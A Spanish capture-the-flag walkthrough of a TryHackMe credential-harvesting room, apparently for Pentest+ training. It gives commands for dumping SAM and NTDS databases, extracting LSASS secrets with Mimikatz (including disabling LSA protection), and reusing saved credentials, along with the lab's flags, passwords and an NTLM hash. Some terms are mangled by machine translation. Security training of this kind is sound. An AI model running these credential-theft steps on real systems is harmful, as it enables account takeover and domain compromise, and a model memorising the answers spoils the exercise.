Hola hacketones! Bienvenidos a un nuevo CTF veremos: TryHackMe CompTIA Pentest+ Credentials Harvesting
Recopilación de credenciales
Aplicar los modelos de autenticación actuales empleados en entornos modernos a un enfoque de equipo rojo.
Tarea 1 Introducción
Bienvenido a la recolección de credenciales
Esta sala analiza los conocimientos fundamentales para los miembros del equipo rojo que aprovechan las credenciales obtenidas para realizar movimientos laterales y acceder a recursos dentro del mismo. Entorno. Mostraremos cómo obtener, reutilizar y suplantar credenciales de usuario.
La extracción de credenciales consiste en técnicas para obtener credenciales como información de inicio de sesión, nombres de cuenta y contraseñas. Es una técnica para extraer información de credenciales de un sistema en diversas ubicaciones, como archivos de texto plano, el registro, volcados de memoria, etc.
Para un miembro del equipo rojo, obtener acceso a credenciales legítimas tiene ventajas:
- Puede dar acceso a sistemas (Movimiento lateral).
- Esto dificulta la detección de nuestras acciones.
- Ofrece la oportunidad de crear y administrar cuentas para ayudar a alcanzar los objetivos finales de una operación de equipo rojo.
Objetivos de aprendizaje
- Comprender el método para extraer credenciales de Windows local (base de datos SAM).
- Aprende cómo acceder a la memoria de Windows y extraer contraseñas y tickets de autenticación en texto plano, tanto local como remotamente.
- Introducción al Administrador de credenciales de Windows y cómo extraer credenciales.
- Aprenda métodos para extraer credenciales para el controlador de dominio.
- Enumere la función de Solución de contraseña de administrador local (LAPS).
- Introducción a ataques que permiten obtener credenciales.
Requisitos de la habitación
Recomendamos encarecidamente completar las siguientes salas de Active Directory antes de adentrarse en esta sala:
- Trayectoria profesional para probadores de penetración junior
- Conceptos básicos de Active Directory
- Violación
- Enumeración
- Movimiento lateral y pivote
Tarea 2 Recopilación de credenciales
Recopilación de credenciales
El robo de credenciales es un término que se utiliza para referirse a la obtención de acceso a las credenciales de usuarios y sistemas. Se trata de una técnica para buscar o robar credenciales almacenadas, incluyendo el análisis de la red, donde un atacante captura las credenciales transmitidas.
Las credenciales se pueden encontrar en una variedad de formatos diferentes, como por ejemplo:
- Datos de la cuenta (nombres de usuario y contraseñas)
- Hashes que incluyen NTLM hashes, etc.
- Boletos de autenticación: Boletos que otorgan boletos (TGT), Servidor de Concesión de Tickets (TGS)
- Cualquier información que ayude a iniciar sesión en un sistema (claves privadas, etc.).
En términos generales, existen dos tipos de recolección de credenciales: externa e interna. La recolección de credenciales externa probablemente implica phishing y otras técnicas para engañar a un usuario para que ingrese su nombre de usuario y contraseña. Si desea obtener más información sobre phishing , sugerimos probar el THM Suplantación de identidad sala. La obtención de credenciales a través de la red interna utiliza diferentes métodos.
En esta sala, la atención se centrará en la obtención de credenciales desde una perspectiva interna, donde un atacante ya ha comprometido un sistema y ha obtenido acceso inicial.
Hemos proporcionado un servidor Windows Server 2019 configurado como controlador de dominio. Para seguir el contenido tratado en esta sala, implemente la máquina y pase a la siguiente tarea.
Puedes acceder a la máquina en el navegador o a través de RDP utilizando las credenciales que aparecen a continuación.
Dirección IP de la máquina: MACHINE_IP Nombre de usuario: thm Contraseña: ¡Passw0rd!
Asegúrese de desplegar AttackBox, ya que es necesario para los ataques que se comentan en esta sala.
Tarea 3 Acceso con credenciales
Acceso con credenciales
El acceso a credenciales permite a los atacantes encontrar credenciales en sistemas comprometidos y obtener acceso a las credenciales de los usuarios. Esto les facilita reutilizarlas o suplantar la identidad de un usuario. Este es un paso importante para el movimiento lateral y el acceso a otros recursos, como otras aplicaciones o sistemas. Se prefiere obtener credenciales de usuario legítimas en lugar de explotar sistemas mediante vulnerabilidades (CVE).
Para obtener más información, puede visitar el INGLETE Marco ATT&CK ( TA0006)).
Las credenciales se almacenan de forma insegura en diversas ubicaciones de los sistemas:
- Archivos de texto plano
- Archivos de base de datos
- Memoria
- gestores de contraseñas
- Bóvedas empresariales
- Directorio activo
- Rastreo de red
¡Hablemos un poco más sobre ellos!
Archivos de texto plano
Los atacantes pueden buscar credenciales en sistemas de archivos locales o remotos de una máquina comprometida. Los archivos de texto plano podrían incluir información confidencial creada por un usuario, que contenga contraseñas, claves privadas, etc. INGLET EEl marco ATT&CK lo define como Credenciales no seguras: Credenciales en archivos ( T1552.001)).
A continuación se muestran algunos de los tipos de archivos de texto plano que podrían interesar a un atacante:
- Historial de comandos
- Archivos de configuración (Aplicación web, FTP archivos, etc.)
- Otros archivos relacionados con aplicaciones de Windows (navegadores de Internet, clientes de correo electrónico, etc.)
- Archivos de copia de seguridad
- Archivos y carpetas compartidos
- Registro
- Código fuente
Como ejemplo de un comando de historial, unPowerShellguardados ejecutadosPowerShellcomandos en un archivo de historial en un perfil de usuario en la siguiente ruta: C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Podría ser útil revisar en qué están trabajando los usuarios o encontrar información confidencial. Otro ejemplo sería encontrar información interesante. Por ejemplo, el siguiente comando busca la palabra clave «password» en el registro de Windows.
Búsqueda de la palabra clave «contraseña» en el Registro
c:\Users\user> reg query HKLM /f password /t REG_SZ /s
#OR
C:\Users\user> reg query HKCU /f password /t REG_SZ /s
Archivos de base de datos
Las aplicaciones utilizan archivos de base de datos para leer o escribir configuraciones, ajustes o credenciales. Los archivos de base de datos suelen almacenarse localmente en los sistemas operativos Windows. Estos archivos son un excelente objetivo para revisar y buscar credenciales. Para obtener más información, le sugerimos que consulte THM habitación: Violación Contiene un ejemplo práctico de cómo extraer credenciales del archivo de base de datos local de McAfee Endpoint.
Gestores de contraseñas
Un gestor de contraseñas es una aplicación para almacenar y administrar la información de inicio de sesión de los usuarios en sitios web y servicios locales y de Internet. Dado que maneja datos de los usuarios, debe almacenarse de forma segura para evitar el acceso no autorizado.
Ejemplos de aplicaciones de gestión de contraseñas:
- Administradores de contraseñas integrados (Windows)
- Servicios de terceros: KeePass, 1Password, LastPass
Sin embargo, en estas aplicaciones se han detectado fallos de configuración y de seguridad que permiten a los atacantes acceder a los datos almacenados. Durante la fase de enumeración, se pueden utilizar diversas herramientas para obtener datos confidenciales en las aplicaciones de gestión de contraseñas utilizadas por navegadores web y aplicaciones de escritorio.
En esta sala se explicará cómo acceder al administrador de credenciales de Windows y extraer contraseñas.
volcado de memoria
La memoria del sistema operativo es una rica fuente de información confidencial que pertenece a Windows. Los datos se cargan en la memoria durante la ejecución. Por lo tanto, el acceso a la memoria está limitado a los usuarios administradores, quienes controlan completamente el sistema.
Los siguientes son ejemplos de datos confidenciales almacenados en memoria, entre los que se incluyen:
- Credenciales en texto plano
- Contraseñas almacenadas en caché
- Entradas
En esta sala, hablaremos sobre cómo acceder a la memoria y extraer contraseñas y tickets de autenticación en texto plano.
Directorio activo
Active Directory almacena gran cantidad de información relacionada con usuarios, grupos, equipos, etc. Por lo tanto, enumerar el entorno de Active Directory es uno de los objetivos principales de las evaluaciones de equipos rojos. Active Directory tiene un diseño sólido, pero una configuración incorrecta por parte de los administradores lo hace vulnerable a diversos ataques, como se muestra en esta sala.
A continuación se detallan algunas de las configuraciones incorrectas de Active Directory que pueden provocar la filtración de las credenciales de los usuarios .
- Descripción del usuario : Los administradores establecen una contraseña en la descripción de los nuevos empleados y la dejan allí, lo que hace que la cuenta sea vulnerable al acceso no autorizado.
- Directiva de grupo SYSVOL : Las claves de cifrado filtradas permiten a los atacantes acceder a las cuentas de administrador. Consulte la Tarea 8 para obtener más información sobre la versión vulnerable de SYSVOL.
- NTDS: Contiene las credenciales de los usuarios, lo que lo convierte en un objetivo para los atacantes.
- Ataques: La mala configuración provoca vulnerable a diversos ataques, que analizaremos en la Tarea 9.
Rastreo de red
Obtener acceso inicial a una red objetivo permite a los atacantes realizar diversos ataques de red contra las computadoras locales, incluyendo la entorno. El ataque Man-In-the-Middle contra protocolos de red permite al atacante crear recursos de confianza falsos o falsificados dentro de la red para robar información de autenticación comoNTLMhashes.
Responda las siguientes preguntas
¿Cómo se puede buscar el valor de la palabra clave «flag» en el registro de Windows mediante el comando «reg query»?
7tyh4ckm3

Enumere el entorno de Active Directory que proporcionamos. ¿Cuál es la contraseña del usuario víctima que se encuentra en la sección de descripción?
Passw0rd!@#
Preguntas Tarea 3
Pregunta 1 — Buscar «flag» en el registro:
Basado en el ejemplo del texto reemplazando «password» por «flag»:
reg query HKLM /f flag /t REG_SZ /s
Pregunta 2 — Contraseña en la descripción del usuario AD
Necesitás conectarte a la máquina y enumerar. Con RDP o desde PowerShell:
powershell
# Opción 1 – PowerShell
Get-ADUser -Filter * -Properties Description | Where-Object {$_.Description -ne $null} | Select-Object Name, Description
O desde cmd:
cmd
net user /domain
Y para cada usuario sospechoso:
cmd
net user <username> /domain
Credenciales de acceso que te dieron
- IP: la de tu máquina desplegada
- Usuario: thm
- Contraseña: Passw0rd!
Conectate via RDP:
bash
xfreerdp /u:thm /p:’Passw0rd!’ /v:MACHINE_IP
Una vez dentro ejecutás el comando PowerShell y buscás qué usuario tiene algo raro en la descripción. ¿Ya tenés la máquina corriendo?
Tarea 4 Credenciales locales de Windows
En general, el sistema operativo Windows proporciona dos tipos de cuentas de usuario: locales y de dominio. Los detalles de los usuarios locales se almacenan localmente dentro de Windows. Los datos de los usuarios del dominio se almacenan en el Directorio Activo centralizado. Esta tarea trata sobre las credenciales de las cuentas de usuario locales y muestra cómo obtenerlas.
pulsaciones de teclas
registrador de pulsaciones de teclas es un dispositivo de software o hardware para monitorear y registrar la actividad de escritura del teclado. Los keyloggers se diseñaron inicialmente para fines legítimos, como retroalimentación para el desarrollo de software o control parental. Sin embargo, pueden usarse indebidamente para robar datos. Como miembro de un equipo rojo, buscar credenciales a través de keyloggers en un entorno interactivo y concurrido es una buena opción. Si sabemos que un objetivo comprometido tiene un usuario conectado, podemos realizar el registro de pulsaciones de teclas utilizando herramientas como Metasploit u otros.
Tenemos un ejemplo de caso de uso para explotar a los usuarios a través de pulsaciones de teclas usando Metasploit en otro THM . Para obtener más información, debe consultar THM Explotación (Tarea 5).
Gestor de cuentas de seguridad (SAM)
La base de datos SAM es una base de datos de Microsoft Windows que contiene información de cuentas locales, como nombres de usuario y contraseñas. La base de datos SAM almacena estos datos en formato cifrado para dificultar su recuperación. Además, ningún usuario puede leerla ni acceder a ella mientras el sistema operativo Windows esté en ejecución. Sin embargo, existen diversos métodos y ataques para extraer el contenido de la base de datos SAM.
Primero, asegúrese de haber implementado el proporcionado VM y luego confirmar que no podemos copiar ni leer el c:\Windows\System32\config\sam archivo:
Confirmación de que no hay acceso a la base de datos SAM

Dump de hash de Metasploit
El primer método consiste en utilizar la función integrada de Metasploit Framework, hashdump, para obtener una copia del contenido de la base de datos SAM. Metasploit Framework utiliza la inyección de código en memoria en el proceso LSASS.exe para volcar los hashes de las copias. Para obtener más información sobre hashdump, puede visitar rapid7.Blog. ¡En otra tarea hablaremos sobre cómo extraer las credenciales directamente del proceso LSASS.exe!
Volcado del contenido de la base de datos SAM

Servicio de instantáneas de volumen
El otro método utiliza el servicio de instantáneas de volumen de Microsoft, que ayuda a realizar una copia de seguridad del volumen mientras las aplicaciones leen o escriben en él. Puede consultar la página de documentación de Microsoft. Para obtener más información sobre el servicio.
Más concretamente, utilizaremos wmic para crear una copia de volumen en la sombra. Esto debe hacerse a través del símbolo del sistema con privilegios de administrador, como se muestra a continuación:
- Ejecute el símbolo del sistema estándar cmd.exe con privilegios de administrador.
- Ejecute el comando wmic para crear una copia de seguridad de la unidad C:.
- Verifique que la creación del paso 2 esté disponible.
- Copie la base de datos SAM del volumen que creamos en el paso 2.
Ahora apliquemos lo que hemos comentado anteriormente y ejecutemos cmd.exe con privilegios de administrador. A continuación, ejecute el siguiente comando wmic:
Creación de una copia de instantánea del volumen C con WMIC

Una vez que el comando se haya ejecutado correctamente, usemos la vssadmin herramienta de línea de comandos administrativa del Servicio de instantáneas de volumen para listar y confirmar que tenemos una copia instantánea del C:volumen.

La salida muestra que hemos creado correctamente un volumen de copia de sombra de (C:) con la siguiente ruta: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1.
Como se mencionó anteriormente, la base de datos SAM está encriptada con RC4.o AESalgoritmos de cifrado. Para descifrarlo, necesitamos una clave de descifrado que también se almacena en el sistema de archivos en c:\Windows\System32\Config\system.
Ahora vamos a copiar ambos archivos (sam y system) desde el volumen de copia de instantáneas que generamos al escritorio de la siguiente manera:
Copiar los archivos SAM y SYSTEM desde el volumen de sombra.
C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\Administrator\Desktop\sam
1 file(s) copied.
C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\Administrator\Desktop\system
1 file(s) copied.
Ahora que tenemos los dos archivos necesarios, transfiéralos a la AttackBox con su método preferido (SCP debería funcionar).
Colmenas de registro
Otro método posible para extraer el contenido de la base de datos SAM es a través del Registro de Windows. El Registro de Windows también almacena una copia de parte del contenido de la base de datos SAM para que la utilicen los servicios de Windows. Afortunadamente, podemos guardar el valor del Registro de Windows con la herramienta reg.exe. Como se mencionó anteriormente, necesitamos dos archivos para descifrar el contenido de la base de datos SAM. Asegúrese de ejecutar el símbolo del sistema con privilegios de administrador.

Esta vez, vamos a descifrarlo usando una de las herramientas de Impacket: secretsdump.py, que ya está instalada en AttackBox. El script Impacket SecretsDump extrae credenciales de un sistema local y remoto usando diferentes técnicas.
Mueva tanto los archivos SAM como los del sistema a AttackBox y ejecute el siguiente comando:
Descifrado de la base de datos SAM mediante el script Impacket SecretsDump localmente

Tenga en cuenta que utilizamos los archivos SAM y del sistema que extrajimos del Registro de Windows. El -sam argumento especifica la ruta del archivo SAM extraído del equipo Windows. El -system argumento especifica la ruta del archivo del sistema. Utilizamos el LOCALargumento al final del comando para descifrar el archivo SAM local, ya que esta herramienta admite otros tipos de descifrado.
Tenga en cuenta que si comparamos el resultado con el NTLM hashes que obtuvimos de Metasploit Al ejecutar Hashdump, el resultado es diferente. Esto se debe a que las otras cuentas pertenecen a Active Directory y su información no está almacenada en el archivo del sistema que hemos extraído. Para descifrarlas, necesitamos extraer el archivo SECURITY del sistema de archivos de Windows, que contiene los archivos necesarios para descifrar las cuentas de Active Directory.
Una vez que obtengamos NTLM Podemos intentar descifrar los hashes usando Hashcat si son predecibles, o podemos usar diferentes técnicas para suplantar la identidad de los usuarios usando los hashes.
Responda las siguientes preguntas
Siga la técnica descrita en esta tarea para volcar el contenido del archivo de base de datos SAM. ¿Cuál es el hash NTLM de la cuenta de administrador?
98d3a787a80d08385cea7fb4aa2a4261:::

Paso a paso — Tarea 4: Credenciales Locales Windows
Paso 1 — Conectarte a la máquina
bash
xfreerdp /u:thm /p:’Passw0rd!’ /v:MACHINE_IP
Paso 2 — Crear Shadow Copy (en cmd como Administrador)
cmd
wmic shadowcopy call create Volume=’C:\’
Verificar que se creó:
cmd
vssadmin list shadows
Copiá la ruta del Shadow Copy, algo como \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Paso 3 — Copiar SAM y SYSTEM del Shadow Volume
cmd
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\Administrator\Desktop\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\Administrator\Desktop\system
Paso 4 — Transferir los archivos al AttackBox
Desde AttackBox:
bash
scp thm@MACHINE_IP:C:/Users/Administrator/Desktop/sam /tmp/
scp thm@MACHINE_IP:C:/Users/Administrator/Desktop/system /tmp/
Paso 5 — Descifrar con secretsdump
bash
python3.9 /opt/impacket/examples/secretsdump.py -sam /tmp/sam -system /tmp/system LOCAL
El hash NTLM del Administrator aparece en el formato:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<HASH_NTLM>:::
Tarea 5 Servicio de subsistema de autoridad de seguridad local (LSASS).
¿Qué es el LSASS?
El Servicio de servidor de autoridad de seguridad local (LSASS) es un proceso de Windows que gestiona la política de seguridad del sistema operativo y la aplica en un sistema. Verifica las cuentas iniciadas y garantiza que las contraseñas, los hashes y Kerberos tickets. El sistema Windows almacena las credenciales en el proceso LSASS para permitir a los usuarios acceder a recursos de red, como recursos compartidos de archivos, sitios de SharePoint y otros servicios de red, sin tener que introducir las credenciales cada vez que un usuario se conecta.
Por lo tanto, el proceso LSASS es un objetivo jugoso para los equipos rojos porque almacena información confidencial sobre las cuentas de usuario. El LSASS se usa comúnmente para volcar credenciales con el fin de escalar privilegios, robar datos o moverse lateralmente. Por suerte para nosotros, si tenemos privilegios de administrador, podemos volcar la memoria del proceso LSASS. El sistema Windows nos permite crear un archivo de volcado, una instantánea de un proceso determinado. Esto se puede hacer con el acceso al Escritorio (Interfaz gráfica de usuario) o el símbolo del sistema. Este ataque se define en el INGLETE Marco ATT&CK como «Extracción de credenciales: Memoria LSASS (T1003)» .
Interfaz gráfica de usuario (Interfaz gráfica de usuario)
Para volcar cualquier proceso de Windows en ejecución usando el Interfaz gráfica de usuario Abra el Administrador de tareas y, en la pestaña Detalles, busque el proceso requerido, haga clic con el botón derecho sobre él y seleccione «Crear archivo de volcado».

Una vez finalizado el proceso de volcado, aparecerá un mensaje emergente con la ruta del archivo volcado. Ahora copie el archivo y transfiéralo a AttackBox para extraerlo. NTLM hashes fuera de línea.
Nota: si intentamos esto en el proporcionado VM Debería aparecer un error la primera vez que se ejecute, hasta que corrijamos el valor del registro en la sección Protected LSASS más adelante en esta tarea.
Copia el proceso volcado a la carpeta Mimikatz.
Copiando el archivo volcado de LSASS
C:\Users\Administrator>copy C:\Users\ADMINI~1\AppData\Local\Temp\2\lsass.DMP C:\Tools\Mimikatz\lsass.DMP
1 file(s) copied.
Suite Sysinternals
Una forma alternativa de volcar un proceso si no disponemos de una interfaz gráfica de usuario es mediante ProcDump. ProcDump es una utilidad de volcado de procesos de Sysinternals que se ejecuta desde la línea de comandos. La suite Sysinternals ya está instalada en la máquina proporcionada en la siguiente ruta:c:\Tools\SysinternalsSuite
Podemos especificar un proceso en ejecución, que en nuestro caso es lsass.exe, para que se muestre el volcado de la siguiente manera:
Volcado del proceso LSASS mediante procdump.exe

Tenga en cuenta que el proceso de volcado escribe en el disco. El volcado del proceso LSASS es una técnica conocida utilizada por los atacantes. Por lo tanto, los antivirus podrían detectarlo como malicioso. En la práctica, podría ser más ingenioso y escribir código para cifrar o implementar un método para eludir los antivirus.
MimiKatz
MimikatzMimikatz es una herramienta muy conocida que se utiliza para extraer contraseñas, hashes, PIN y tickets Kerberos de la memoria mediante diversas técnicas. Es una herramienta de post-explotación que permite realizar otros ataques útiles , como pass-the-hash, pass-the-ticket o la creación de tickets Golden Kerberos . Mimikatz accede a la información desde la memoria del sistema operativo. Por lo tanto, requiere privilegios de administrador y de sistema para volcar la memoria y extraer las credenciales.
Usaremos la Mimikatz herramienta para extraer el volcado de memoria del proceso lsass.exe. Le hemos proporcionado las herramientas necesarias, que puede encontrar en : c:\Tools\Mimikatz.
Recuerda que el proceso LSASS se ejecuta como SYSTEM. Por lo tanto, para acceder a los hashes de los usuarios, necesitamos permisos de administrador del sistema o local. Así pues, abre el símbolo del sistema y ejecútalo como administrador. A continuación, ejecuta el binario mimikatz de la siguiente manera:

Antes de volcar la memoria para obtener credenciales y hashes almacenados en caché, necesitamos habilitar SeDebugPrivilege y verificar los permisos actuales para el acceso a la memoria. Esto se puede hacer ejecutando el siguiente comando: privilege::debug
Comprobando el permiso actual para acceder a la memoria.
mimikatz # privilege::debug
Privilege ’20’ OK
Una vez otorgados los privilegios, podemos acceder a la memoria para volcar todas las contraseñas y hashes almacenados en lsass.execaché del proceso sekurlsa::logonpasswords. Si intentamos esto en la máquina virtual proporcionada, no funcionará hasta que lo solucionemos en la siguiente sección.

Mimikatz enumera mucha información sobre cuentas y máquinas. Si revisamos detenidamente la sección Principal para usuarios administradores, podemos ver que tenemos unNTLMpicadillo.
Tenga en cuenta que para obtener los hashes de los usuarios, un usuario (víctima) debe haber iniciado sesión en un sistema y sus credenciales deben haber sido almacenadas en caché.
LSASS protegido
En 2012, Microsoft implementó una protección LSA para evitar que se accediera a LSASS y se extrajeran las credenciales de la memoria. Esta tarea mostrará cómo deshabilitar la protección LSA y extraer las credenciales de la memoria usando Mimikatz. Para habilitar la protección LSASS, podemos modificar el valor DWORD RunAsPPL del registro a HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa 1.
Los pasos son similares a los de la sección anterior, que ejecuta el archivo ejecutable de Mimikatz con privilegios de administrador y habilita el modo de depuración. Si la protección LSA está habilitada, se producirá un error al ejecutar el comando «sekurlsa::logonpasswords».
Error al volcar la contraseña almacenada debido a la protección LSA.
mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
El comando devuelve un mensaje de código de error 0x00000005 (Acceso denegado). Por suerte, Mimikatz proporciona un controlador mimidrv.sys que funciona a nivel del kernel para deshabilitar la protección LSA. Podemos importarlo a Mimikatz ejecutando «!+» de la siguiente manera:

Nota: Si se produce un isFileExisterror, salga de Mimikatz, navegue hasta la ubicación indicada C:\Tools\Mimikatz\y ejecute el comando nuevamente.
Una vez cargado el controlador, podemos deshabilitar la protección LSA ejecutando el siguiente comando de Mimikatz:

Ahora bien, si intentamos ejecutar de nuevo el comando «sekurlsa::logonpasswords», este debería ejecutarse correctamente y mostrar las credenciales almacenadas en caché en la memoria.
Responda las siguientes preguntas
¿Está habilitada la protección LSA? (Y|N)
Y
Tarea 6 Administrador de credenciales de Windows
Esta tarea presenta el Administrador de credenciales de Windows y analiza la técnica utilizada para extraer las credenciales del sistema mediante su explotación.
¿Qué es Credentials Manager?
El Administrador de credenciales es una función de Windows que almacena información confidencial de inicio de sesión para sitios web, aplicaciones y redes. Contiene credenciales de inicio de sesión como nombres de usuario, contraseñas y direcciones de Internet. Existen cuatro categorías de credenciales:
- Las credenciales web contienen detalles de autenticación almacenados en navegadores de Internet u otras aplicaciones.
- Las credenciales de Windows contienen detalles de autenticación de Windows, como por ejemplo:NTLMoKerberos.
- Las credenciales genéricas contienen detalles básicos de autenticación, como nombres de usuario y contraseñas en texto plano.
- Credenciales basadas en certificados: Se trata de detalles de autenticación basados en certificados.
Tenga en cuenta que los detalles de autenticación se almacenan en la carpeta del usuario y no se comparten entre las cuentas de usuario de Windows. Sin embargo, se almacenan en la memoria caché.
Acceso al Administrador de credenciales
Podemos acceder al Administrador de credenciales de Windows a través deInterfaz gráfica de usuario(Panel de control -> Cuentas de usuario -> Administrador de credenciales) o el símbolo del sistema. En esta tarea, nos centraremos más en el escenario del símbolo del sistema dondeInterfaz gráfica de usuarioNo está disponible.

Usaremos la vaultcmdutilidad Administrador de credenciales de Microsoft. Comencemos por verificar si hay credenciales almacenadas. Primero, listamos los almacenes de credenciales de Windows disponibles en el sistema operativo Windows de destino.

Por defecto, Windows tiene dos almacenes de credenciales: uno para la web y otro para las credenciales de las máquinas Windows. El resultado anterior confirma que tenemos los dos almacenes predeterminados.
Vamos a comprobar si hay credenciales almacenadas en el almacén de credenciales web ejecutando el comando vaultcmd con /listproperties.

La salida muestra que tenemos una credencial almacenada en la bóveda especificada. Ahora intentemos enumerar más información sobre la credencial almacenada de la siguiente manera:

Extracción de credenciales
VaultCmd no puede mostrar la contraseña, pero podemos recurrir a otros scripts de PowerShell como Get-WebCredentials.ps1., que ya está incluido en la máquina virtual adjunta.
Asegúrese de ejecutar PowerShell con la política de omisión para importarlo como un módulo de la siguiente manera:

El resultado muestra que obtuvimos el nombre de usuario y la contraseña para acceder a la aplicación interna.
RunAs
Una alternativa para aprovechar las credenciales almacenadas es usar RunAs. RunAs es una herramienta integrada de línea de comandos que permite ejecutar aplicaciones o herramientas de Windows con permisos de distintos usuarios. RunAs cuenta con varios argumento s que se pueden usar en Windows. Este /savecred argumento permite guardar las credenciales del usuario en el Administrador de credenciales de Windows (en la sección Credenciales de Windows). De esta forma, la próxima vez que ejecutemos el programa con el mismo usuario, RunAs no solicitará la contraseña.
Vamos a aplicarlo a la máquina Windows adjunta. Otra forma de enumerar las credenciales almacenadas es usando cmdkey, que es una herramienta para crear, eliminar y mostrar credenciales de Windows almacenadas. Al proporcionar el /list argumento , podemos mostrar todas las credenciales almacenadas, o podemos especificar la credencial para mostrar más detalles /list:computername.

El resultado muestra que tenemos una contraseña de dominio almacenada como thm\thm-localusuario. Tenga en cuenta que las credenciales almacenadas también podrían ser para otros servidores. Ahora usemos `runas` para ejecutar aplicaciones de Windows como el thm-localusuario.

Aparece una nueva ventana de cmd.exe con un símbolo del sistema listo para usar. Ahora ejecuta el comando whoami para confirmar que estamos trabajando con el usuario deseado. Hay una bandera en el archivo c:\Users\thm-local\Saved Games\flag.txt; intenta leerla y responde la pregunta a continuación.
Mimikatz
Mimikatz es una herramienta que permite extraer de la memoria las contraseñas en texto plano almacenadas en el Administrador de credenciales. Los pasos son similares a los mostrados en la sección anterior (Extracción de memoria), pero en este caso podemos especificar que solo se muestre la sección del Administrador de credenciales.
Volcado de memoria para el administrador de credenciales

Aplique esta técnica a la máquina adjunta y responda a la pregunta que aparece a continuación.
Las técnicas analizadas en esta tarea también podrían realizarse a través de otras herramientas como Empire,Metasploit, etc. Puedes hacer tu propia investigación para ampliar tus conocimientos.
Responda las siguientes preguntas
Aplique la técnica para extraer contraseñas en texto plano del Administrador de credenciales de Windows. ¿Cuál es la contraseña del usuario THMuser para internal-app.thm.red?
E4syPassw0rd
Utilice Mimikatz para extraer las credenciales del recurso compartido SMB 10.10.237.226, que se encuentra almacenado en el almacén de credenciales de Windows. ¿Cuál es la contraseña?
jfxKruLkkxoPjwe3
Ejecuta cmd.exe con el usuario thm-local mediante runas y lee el valor del archivo «c:\Users\thm-local\Saved Games\flag.txt». ¿Cuál es el valor del archivo?
THM{RunA5S4veCr3ds}
Tarea 7 Controlador de dominio

Paso a paso — Tarea 6: Credential Manager
Pregunta 1 — Contraseña de THMUser para internal-app.thm.red
En la máquina Windows como Administrator:
powershell
powershell -ex bypass
Import-Module C:\Tools\Get-WebCredentials.ps1
Get-WebCredentials
La contraseña aparece directamente en el output — ya está en el texto del ejemplo: Password!
Pregunta 2 — Contraseña del recurso SMB con Mimikatz
cmd
c:\Tools\Mimikatz\mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::credman
Buscás en el output una entrada relacionada con 10.10.X.X (la IP del SMB) y ahí aparece la contraseña.
Pregunta 3 — Flag de thm-local
Paso 1 — Verificar credenciales guardadas:
cmd
cmdkey /list
Paso 2 — Ejecutar cmd como thm-local:
cmd
runas /savecred /user:THM.red\thm-local cmd.exe
Se abre una nueva ventana cmd.
Paso 3 — En la nueva ventana leer la flag:
cmd
type c:\Users\thm-local\Saved Games\flag.txt
Tarea 7 Controlador de dominio
Esta tarea describe los pasos necesarios para volcar los hashes de los controladores de dominio de forma local y remota.
Controlador de dominio NTDS
New Technologies Directory Services (NTDS) es una base de datos que contiene todos los datos de Active Directory, incluidos objetos, atributos, credenciales, etc. Los datos de NTDS.DTS constan de tres tablas como se indica a continuación:
- Tabla de esquema: contiene los tipos de objetos y sus relaciones.
- Tabla de enlaces: contiene los atributos del objeto y sus valores.
- Tipo de datos: Contiene usuarios y grupos.
NTDS se encuentra en C:\Windows\NTDSla ubicación predeterminada y está cifrado para evitar la extracción de datos de una máquina objetivo. El acceso al archivo NTDS.dit desde la máquina en ejecución no está permitido, ya que el archivo es utilizado por Active Directory y está bloqueado. Sin embargo, existen varias formas de acceder a él. Esta tarea explicará cómo obtener una copia del archivo NTDS usando las herramientas ntdsutil y Diskshadow, y finalmente cómo volcar el contenido del archivo. Es importante tener en cuenta que el descifrado del archivo NTDS requiere una clave de arranque del sistema para intentar descifrar las credenciales aisladas LSA, que se almacenan en el SECURITY sistema de archivos. Por lo tanto, también debemos volcar el archivo de seguridad que contiene todos los archivos necesarios para el descifrado.
Ntdsutil
Ntdsutil es una utilidad de Windows que se utiliza para administrar y mantener las configuraciones de Active Directory. Se puede utilizar en varios escenarios, como por ejemplo:
- Restaurar objetos eliminados en Active Directory.
- Realizar el mantenimiento de la base de datos de Active Directory.
- Administración de instantáneas de Active Directory.
- Establezca las contraseñas de administrador del Modo de restauración de servicios de directorio (DSRM).
Para obtener más información sobre Ntdsutil, puede visitar la página de documentación de Microsoft..
Vertido local (sin credenciales)
Esto se suele hacer si no se dispone de credenciales, pero se tiene acceso de administrador al controlador de dominio. Por lo tanto, utilizaremos utilidades de Windows para extraer el archivo NTDS y descifrarlo sin conexión. Como requisito previo, asumimos que tenemos acceso de administrador a un controlador de dominio.
Para volcar correctamente el contenido del archivo NTDS necesitamos los siguientes archivos:
- C:\Windows\NTDS\ntds.dit
- C:\Windows\System32\config\SYSTEM
- C:\Windows\System32\config\SECURITY
A continuación se muestra un comando de PowerShell de una sola línea para volcar el archivo NTDS utilizando la herramienta Ntdsutil en el C:\tempdirectorio.
Volcado del contenido del archivo NTDS de la máquina víctima.
powershell «ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full c:\temp’ q q»
Ahora, si revisamos elc:\temp directorio, vemos dos carpetas: Active Directory y registry, que contienen los tres archivos que necesitamos. Transfiéralos a AttackBox y ejecute el script secretsdump.py para extraer los hashes del archivo de memoria volcado.
Extraer hashes de NTDS localmente
user@machine$python3.9 /opt/impacket/examples/secretsdump.py -securitypath/to/SECURITY -systempath/to/SYSTEM -ntdspath/to/ntds.dit local
Extracción remota de datos (con credenciales)
En la sección anterior, vimos cómo obtener hashes de la memoria sin necesidad de credenciales. En esta tarea, mostraremos cómo extraer de forma remota los hashes de un sistema y un controlador de dominio, lo cual requiere credenciales, como contraseñas o hashes NTLM. También necesitamos las credenciales de los usuarios con acceso administrativo a un controlador de dominio o con permisos especiales, como se explicó en la sección de Sincronización de controladores de dominio.
Sincronización de CC
